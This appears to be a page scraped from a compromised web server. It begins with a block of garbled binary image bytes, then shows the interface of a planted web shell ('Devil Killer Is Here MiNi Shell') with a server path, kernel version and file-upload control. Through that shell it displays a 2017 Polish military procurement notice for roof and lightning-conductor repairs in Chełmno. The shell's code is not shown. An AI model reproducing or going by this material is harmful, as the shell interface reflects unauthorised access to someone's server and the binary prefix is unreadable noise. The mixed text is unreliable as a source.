JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17425_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17425</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>13 Wojskowy Oddział Gospodarczy</nazwa><ulica>ul. Czwartaków</ulica><nr_domu>3</nr_domu><nr_miesz></nr_miesz><miejscowosc>Grudziądz</miejscowosc><kod_poczt>86300 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>kujawsko-pomorskie</wojewodztwo><tel>261 48 32 90, 261 48 32 00</tel><fax>261 48 32 22</fax><email>przetargi@13wog.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.13wog.pl</adres_strony_url><podmiot2c></podmiot2c><regon>34090727700000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>www.13wog.pl</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.13wog.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>w formie pisemnej</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>13 WOJSKOWY ODDZIAŁ GOSPODARCZY, UL. CZWARTAKÓW 3, 86-300 GRUDZIĄDZ bud 1 pom. 07</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>REMONT DACHU WRAZ Z OPRACOWANIEM PROJEKTU NA WYMIANĘ INSTALACJI ODGROMOWEJ I JEJ WYKONANIEM - BUDYNEK NR 4 W KOMPLEKSIE WOJSKOWYM PRZY AL. 3-GO MAJA 2-4 W CHEŁMNIE - sprawa nr 5/2017
</nazwa_zamowienia><numer_referencyjny>5/2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>1.	Przedmiotem zamówienia jest remont dachu wraz z opracowaniem projektu na wymianę instalacji odgromowej i jej wykonaniem - budynek nr 4 w kompleksie wojskowym przy al. 3-go maja 2-4 w Chełmnie.
2.	Zakres przedmiotu zamówienia obejmuje:
1)	opracowanie projektu na wymianę instalacji odgromowej z należytą starannością w sposób zgodny 
z postanowieniami warunków umowy oraz zgodnie z obowiązującymi przepisami prawa 
w szczególności ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2016 r. poz. 290 j.t.) oraz Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012 r. poz.462 z późn. zm.). Na dokumentację składać się winny w szczególności:
przedmiar robót – wykonany w dwóch pisemnych egzemplarzach;
specyfikacja techniczna wykonania i odbioru robót (STWiOR) – wykonana w dwóch pisemnych egzemplarzach;
projekt budowlano-wykonawczy – wykonany w czterech egzemplarzach;
uzgodnienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016 r. poz.290 j.t.) i przepisami branżowymi. 
2)	wykonanie robót w szczególności w zakresie: wymiany pokrycia dachowego z dachówki karpiówki na dachówkę karpiówkę wraz z wymianą łacenia dachu, wymiany rynien, rur spustowych i obróbek blacharskich, przemurowanie kominów ponad dachem, malowanie stolarki okiennej, wymiany instalacji odgromowej, wywozu i utylizacji odpadów. Do zakresu robót należy również wykonanie prac towarzyszących polegających na ogrodzeniu etapów robót, oświetleniu terenu robót, zabezpieczeniu terenu w poręcze, mostki, daszki, oznakowaniu terenu znakami ostrzegawczymi, wykonaniu i utrzymaniu zaplecza budowy, oznaczeniu i zabezpieczeniu instalacji i urządzeń na terenie robót.

Realizacja robót będzie następować w formie dwuetapowej. Wykonawca w pierwszej kolejności 
(etap nr 1) będzie zobowiązany do opracowania projektu budowlano-wykonawczego i specyfikacji technicznej wykonania i odbioru robót na wymianę instalacji odgromowej wraz z uzyskaniem niezbędnych opinii, uzgodnień. Kolejno (etap nr 2) po zaakceptowaniu i przyjęciu dokumentacji, o której mowa przez Zamawiającego, Wykonawca przystąpi do remontu dachu wraz z wymianą instalacji odgromowej na podstawie opracowanej dokumentacji projektowej w etapie nr 1. Warunkiem przystąpienia Wykonawcy do realizacji drugiego etapu jest zrealizowanie etapu nr 1.
Wykonanie etapów zakresu przedmiotu zamówienia będzie następowało na zasadach określonych treścią zawartej umowy.


Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV) oraz zgodnie 
z Rozporządzeniem Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie wykazu robót budowlanych (Dz.U. z 2016 r.,  poz. 1125):
KOD 71242000-6	- przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów
KOD 45111300-1 	- roboty rozbiórkowe
KOD 45261000-4	- wykonywanie pokryć dachowych i konstrukcji dachowych oraz podobne roboty
KOD 45261320-3	- kładzenie rynien
KOD 45442100-8 	- roboty malarskie
KOD 45312311-0	- montaż instalacji piorunochronnej
KOD 90500000-2	- usługi związane z odpadami



3.	Szczegółowy opis przedmiotu zamówienia określa w szczególności: przedmiar robót, specyfikacja techniczna wykonania i odbioru robót oraz program funkcjonalno-użytkowy oraz ogólne warunki umowy.
4.	Budynek, w zakresie którego będą wykonywane roboty na czas ich realizacji będzie czynny. Wszystkie prace budowlane należy zorganizować i przeprowadzić tak, aby zapewnić bezpieczeństwo dla osób przebywających na terenie i budynku robót.
5.	Wynagrodzenie Wykonawcy za wykonanie przedmiotu zamówienia określa się w sposób kosztorysowy, według cen wskazanych w ofercie Wykonawcy.
6.	Wykonawca zapewnia wszelkie materiały i urządzenia niezbędne do wykonania przedmiotu zamówienia 
we własnym zakresie i na swój koszt oraz zobowiązany jest do stosowania wyrobów budowlanych zgodnych ze specyfikacją techniczną wykonania i odbioru robót oraz dopuszczonymi do stosowania przez ustawę 
z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U. z 2016 r., poz. 290 z późn.zm.), posiadającymi aktualne atesty i certyfikaty pozwalające na ich stosowanie.
7.	Użyte do wykonania przedmiotu zamówienia materiały, nie mogą obniżać wartości użytkowej i jakościowej wykonanych elementów zamówienia ani ujemnie wpływać na wytrzymałość, funkcjonalność 
i bezpieczeństwo użytkowania i korzystania z terenu robót i jego granicach.
8.	Wykonawca zobowiązany jest do wykonania robót zgodnie ze sztuką budowlaną i standardami budowlanymi, obowiązującymi przepisami i normami technicznymi oraz technologicznymi, przy zachowaniu obowiązujących przepisów BHP.
9.	Przedmiot zamówienia winien być wykonany zgodnie z dokumentacją opracowaną jak w Opis przedmiotu zamówienia oraz wytycznymi (poleceniami) Zamawiającego i Inspektora Nadzoru.
10.	Transport wszelkich materiałów oraz urządzeń na miejsce realizacji robót i ich eksploatacja obciążają Wykonawcę. 
11.	Wykonawca zobowiązany jest do zapewnienia we własnym zakresie wywozu i utylizacji odpadów (śmieci, gruz itp.) zgodnie z obowiązującymi przepisami prawa a w szczególności ustawy o odpadach (art. 3 ust.1 pkt 32 ustawy o odpadach z dnia 14.12.2012 r., Dz.U. z 2016 r. poz. 1987 z późn.zm.) oraz udokumentowania tych czynności.
12.	Wykonawca zobowiązany jest do odbioru i wywozu pozyskanego podczas robót budowlanych złomu. Pozyskiwany z demontażu na bieżąco złom winien zostać niezwłocznie przeważony w obecności inspektora nadzoru po stronie Zamawiającego. Wywóz złomu z terenu budowy będzie możliwy  po pisemnym powiadomieniu i zaakceptowaniu dokumentu przez inspektora nadzoru. Z każdorazowego wywozu  
i przeważenia zostanie sporządzone zestawienie ilościowe pozyskanego z demontażu złomu ze wskazaniem kryterium rodzajowego (złom stalowy, żeliwny, kolorowy). 
Każdorazowo na podstawie sporządzonego zestawienia pozyskanego z demontażu złomu Zamawiający wystawi fakturę VAT zgodnie z aktualnie obowiązującymi przepisami ustawy i tym samym upoważni Wykonawcę do sprzedaży, bądź zagospodarowania pozyskanego z demontażu złomu.
Wartość złomu zostanie ustalona następująco: ilość kg złomu stalowego x 0,53 zł/kg (średnia cena hurtowa w województwie kujawsko-pomorskim)
13.	Zamawiający wymaga od Wykonawcy lub podwykonawcy aby osoby wykonujące wskazane przez niego czynności w zakresie realizacji zamówienia były zatrudnione na umowę o pracę, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy 
z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz.U. z 2016 r. poz. 380, z późn. zm.). Wykonawca lub podwykonawca jest zobowiązany zatrudnić lub zatrudniać na umowę o pracę w wymiarze czasu pracy nie mniejszym niż połowa etatu co najmniej 30% grupy osób przeznaczonych ogółem do realizacji robót objętych przedmiotem zamówienia co najmniej na czas realizacji umowy zawartej pomiędzy Wykonawcą 
a Zamawiającym.
a)	sposób dokumentowania zatrudnienia osób, o których mowa:
Wykonawca w terminie nie później niż do przyjęcia terenu robót budowlanych jest zobowiązany do przedłożenia Zamawiającemu „Wykazu pracowników realizujących roboty budowlane” z oznaczeniem osób zatrudnionych na umową o pracę i wskazaniem czasu zatrudnienia danej osoby oraz wymiaru czasu pracy, PESEL i adres zamieszkania – Wykonawca przedkłada „Wykaz” w formie czytelnego pisemnego oświadczenia potwierdzającego stan faktyczny pod rygorem odpowiedzialności karnej. Dane osobowe i inne należy oznaczyć jako chronione, nie podlegające udostępnianiu i jawności zgodnie 
z obowiązującymi przepisami prawa.
Jeżeli „Wykaz pracowników …” stanowi tajemnicę przedsiębiorstwa Wykonawca winien nadać temu dokumentowi odpowiednie klauzule.
b)	uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa 
w art. 29 ust. 3a, oraz sankcji z tytułu niespełnienia tych wymagań:
Na etapie realizacji umowy na każde żądanie Zamawiającego, Wykonawca w terminie dwóch dni roboczych od dnia wezwania okaże Zamawiającemu dokumenty oryginalne potwierdzające zatrudnienie wykazanych osób np. umowy o pracę.
Niespełnienie wymagań określonych przez Zamawiającego oznaczać będzie nienależyte wykonanie umowy przez Wykonawcę co objęte jest karami określonymi w Ogólnych Warunkach umowy.
W przypadku podania przez Wykonawcę nieprawdziwych informacji sprawy te będą przekazane właściwym organom, w których kompetencjach jest rozstrzyganie tego rodzaju działań Wykonawcy.
c)	rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia został określony w STWiOR oraz przedmiarze robót. 
14.	Zamawiający umożliwia, dokonanie przez Wykonawców wizji lokalnej na terenie realizacji przedmiotu zamówienia w celu przygotowania oferty:
1)	o zamiarze uczestnictwa w wizji lokalnej należy poinformować Zamawiającego pisemnie lub/i faksem lub/i 
e-mail – sprawa numer 5/2017, Zamawiający w odpowiedzi na zgłoszenie wyznaczy termin dokonania wizji lokalnej;
2)	osoby, które będą okazywać przedmiot zamówienia są upoważnione do udostępnienia terenu 
w zakresie jego okazania. Prowadzenie jakichkolwiek ustaleń z osobami nie jest wiążące. Wszelkie merytoryczne zapytania należy kierować pisemnie bezpośrednio na adres Zamawiającego.
3)	dokonania wizji lokalnej w miejscu wykonywania zamówienia może dokonać przedstawiciel Wykonawcy ubiegający się o udzielenie zamówienia, który udostępni przed rozpoczęciem wizji lokalnej imienne upoważnienie do reprezentowania Wykonawcy, oraz dowód tożsamości; 
4)	z przeprowadzonej wizji lokalnej zostanie sporządzony protokół.
Zamawiający nie przewiduje udzielania wyjaśnień podczas wizji lokalnej, wizja ma służyć okazaniu obiektu robót budowlanych.
15.	Zakazuje się dokonywanie wizji lokalnej, zdjęć, nagrań, zbierania danych z wykorzystywaniem aparatów latających, w tym BSP typu „Dron”.
16.	Szczegółowa realizacja zamówień odbywać się będzie na zasadach określonych w treści umowy (Ogólne warunki).




</przedmiot_zam><cpv1c>71242000-6</cpv1c><cpv2c>45111300-1</cpv2c><okres2c>20/10/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Zamówienie publiczne będzie realizowane  w dni robocze od poniedziałku do piątku (od poniedziałku do czwartku w godz. 7.00 do 15.30 i w piątki od godz. 7.00 do 13.00) w terminie do 20.10.2017 r., w tym:
Etap nr 1 – opracowanie dokumentacji odgromowej  winien zostać zrealizowany w terminie do 30 dni roboczych od dnia zawarcia umowy
Etap nr 2 – wykonanie robót winno zostać zrealizowane maksymalnie do 20.10.2017 r.
Jeżeli Wykonawca zaoferuje termin realizacji krótszy niż wymagany będzie on obowiązywał zgodnie z treścią oferty (Rozdział XIII ust.1  SIWZ).</informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow></sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Wykonawcy w celu wykazania spełnia warunku udziału w postępowaniu dotyczącego zdolności zawodowej (art. 22 
ust. 1 pkt. 2) p.z.p.:
a)	Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty oraz zgodnie 
z przepisami prawa budowlanego i prawidłowo ukończył co najmniej dwie roboty budowlane w zakresie budowy lub/i remontów dachów krytych dachówką – każda  co najmniej na kwotę 300.000,00 zł brutto;                                                 
b)	Wykonawca wykaże, że będzie dysponował w okresie realizacji zamówienia publicznego:
jedną osobą odpowiedzialną za kierowanie robotami budowlanymi, skierowaną przez niego do realizacji przedmiotu zamówienia tj. kierownikiem robót budowlanych, uprawnionym do kierowania robotami 
w zakresie ogólnobudowlanym w specjalności konstrukcyjno-budowlanej, minimum w ograniczonym zakresie, należącym w sposób czynny do Izby Inżynierów Budownictwa;
jedną osobą, tj. kierownikiem robót, uprawnionym do kierowania robotami w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, minimum w ograniczonym zakresie, należącym w sposób czynny do Izby Inżynierów Budownictwa,
jedną osobą, tj. projektantem uprawnionym do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, należącym w sposób czynny do Izby Inżynierów Budownictwa,
Uwaga: Zamawiający wyjaśnia, iż przez wyrażenie „w sposób czynny” należy rozumieć przynależność danej osoby do Izby Inżynierów Budownictwa, ubezpieczonej od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie, korzystający w sposób nieograniczony z praw mu przysługujących tj. osoba nie została zawieszona, wykreślona itp. (ustawa z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa Dz.U. z 2016 r., poz. 1725 z późn.zm.).
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe>1. Wykonawca może w celu potwierdzenia spełniania warunków, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach zawodowych, innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
1)	Wykonawca, który polega na zdolnościach innych podmiotów udowodni Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia oraz przedstawienia informacji:
zakres dostępnych Wykonawcy zasobów innego podmiotu; 
sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego; 
zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego; 
czy podmiot, na zdolnościach, którego Wykonawca polega w odniesieniu do warunków udziału 
w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą;
2)	Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13–23 i ust. 5 pkt. 1 p.z.p.
3)	Jeżeli zdolności zawodowe, innego podmiotu, o którym mowa w ust. 2, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego: 
zastąpił ten podmiot innym podmiotem lub podmiotami 
lub 
zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe.
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 Ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.

3.	Zamawiający może, na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy 
w inne przedsięwzięcie gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.
4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, 
 zostaną spełnione wyłącznie jeżeli co najmniej jeden z Wykonawców spełnia warunki w zakresie zdolności zawodowej i ten Wykonawca będzie faktycznie realizował tę część zamówienia, w której wykazał spełnienie warunku udziału, o którym mowa.
Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w ust. 1 SIWZ.
	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia np. łącząc się w konsorcja albo tworząc spółki cywilne.
	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania  w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
	W przypadku, o którym mowa Wykonawca musi złożyć wraz z ofertą stosowne pełnomocnictwo uprawniające do wykonywania określonych czynności w postępowaniu o udzieleniu zamówienia publicznego w formie oryginału pełnomocnictwa do działania innych/ej osób/y w jego imieniu lub notarialnie poświadczoną kopię pełnomocnictwa.
</zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow /><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>1.	Wykonawca, którego oferta w wyniku wstępnej oceny okaże się najkorzystniejsza przedłoży 
w terminie nie krótszym niż 5 dni od daty otrzymanego wezwania od Zamawiającego, dokumenty 
i oświadczenia potwierdzające brak podstaw do wykluczenia (art. 24 ust. 1 i ust. 5 pkt.1 Ustawy):
1)informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 
i 21 Ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
w postępowaniu;
